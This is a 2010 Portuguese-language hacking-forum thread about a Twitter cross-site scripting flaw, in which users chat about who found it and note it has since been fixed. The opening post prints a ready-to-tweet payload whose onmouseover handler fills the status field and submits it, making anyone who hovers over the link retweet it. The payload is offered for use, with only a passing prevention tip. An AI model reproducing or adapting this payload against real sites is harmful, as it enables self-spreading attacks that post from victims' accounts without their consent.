FORUM DARKERS

Segurança & Hacking => Malware | Cracking | Hacker Tools => Topic started by: zombie on 21 de September , 2010, 11:11:05 AM

Title: xss on twitter
Post by: zombie on 21 de September , 2010, 11:11:05 AM
Falha no twtter permite execucoes de scripts xss:

twitta esse codigo:
http://t.co/@ (http://t.co/@)"onmouseover="document.getElementById('status').value='RT jessyi7′;$('.status-update-form').submit();"class="modal-overlay"/
apos o usuario passa o mouse em cima do codigo ele e executado ..
Prevencao:
Na utulizacao de um cliente tipo tweetdeck, o script nao e executado...
Title: Re:xss on twitter
Post by: n0mor3 on 21 de September , 2010, 03:08:31 PM
Puts, é engano meu ou começou a ser descoberto os bugs do twitter?
voce quem descobriu esse xss, zombie ?
agora é tenso ficar usando o tweetdeck...

valeu o toque, []'s
Title: Re:xss on twitter
Post by: zombie on 21 de September , 2010, 04:32:14 PM
fala fpois0n bele..
nao nao.. nao fui eu que descobri a falha... so tava no twitter na hora do teste^^
faz tempo que parrei com estudos e "testes"^^  da area. Mas estou pretendendo voltar!

E sobre o twtter.. cada dia sai um  exploit novo pra ele.. mas o pessoal la ta antenado!!
JA ARRUMARAM PARA ESSA FUL..
Title: Re:xss on twitter
Post by: Reeves on 22 de September , 2010, 12:21:31 PM
Incrivel como o twitter consegue sofrer meses uma falha tão idiota como XSS! ;)
Title: Re:xss on twitter
Post by: zombie on 22 de September , 2010, 07:43:44 PM
Fala Reeves master servers ... haushsauhausah
sao "tudo" uns cabaco pelo jeito...